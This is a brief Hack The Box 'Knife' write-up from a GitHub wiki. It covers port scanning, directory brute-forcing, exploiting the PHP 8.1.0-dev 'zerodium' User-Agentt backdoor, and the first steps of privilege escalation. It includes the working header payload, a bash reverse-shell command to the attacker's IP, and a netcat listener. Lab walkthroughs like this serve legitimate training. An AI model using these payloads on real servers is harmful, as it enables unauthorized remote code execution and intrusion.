HTB Knife - lmiyasato/lenny-hacking GitHub Wiki
This is just a quick & dirty writeup on the HTB Knife box.
Recon
Run nmap scan
kali@kali:~/Documents/HTB/knife$ nmap -p- --min-rate 10000 -oA nmap-alltcp 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 22:12 EDT
Scanned at 2021-10-05 22:12:00 EDT for 50s
Not shown: 45253 closed ports, 20280 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Detailed scan on ports 22 & 80
kali@kali:~/Documents/HTB/knife$ nmap -p 22,80 -sCV -oA nmap-alltcp 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 22:15 EDT
Nmap scan report for 10.10.10.242
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory Brute Force:
Run the feroxbuster tool (similar to gobuster/FFUF, but much cooler)
kali@kali:~/Documents/HTB/knife$ feroxbuster -u http://10.10.10.242 -o ferozbuster-root-php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher π€ ver: 2.3.3
ββββββββββββββββββββββββββββ¬ββββββββββββββββββββββ
π― Target Url β http://10.10.10.242
π Threads β 50
π Wordlist β /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
π Status Codes β [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
π₯ Timeout (secs) β 7
𦑠User-Agent β feroxbuster/2.3.3
π Config File β /etc/feroxbuster/ferox-config.toml
πΎ Output File β ferozbuster-root-php
π Recursion Depth β 4
ββββββββββββββββββββββββββββ΄ββββββββββββββββββββββ
π Press [ENTER] to use the Scan Cancel Menuβ’
ββββββββββββββββββββββββββββββββββββββββββββββββββ
π¨ Caught ctrl+c π¨ saving scan state to ferox-http_10_10_10_242-1633487422.state ...
[##>-----------------] - 1m 26287/220545 11m found:0 errors:5
[##>-----------------] - 1m 26286/220545 271/s http://10.10.10.242
Initial exploit
The reponse shows that the web page is running PHP/8.1.0-dev. Apparently there is an exploit for it.
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 02:40:38 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8
Tweak the request as the following:
GET / HTTP/1.1
Host: 10.10.10.242
User-Agentt: zerodium system("id");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
modify "id" to:
("bash -c 'bash -i >& /dev/tcp/10.10.14.28/443 0>&1'");
Set up a listener on the attack box:
kali@kali:~/Documents/HTB/knife$ sudo nc -nvlp 443
[sudo] password for kali:
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.242.
Ncat: Connection from 10.10.10.242:32842.
bash: cannot set terminal process group (972): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
Now get a nicer shell and grab the user.txt flag:
james@knife:/$ python3 -c 'import pty;pty.spawn("bash")'
Privesc to root:
Do a sudo -l to see what can be ran as root. Looks like "knife" can be ran as root. More info on GTFObins on knife...
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife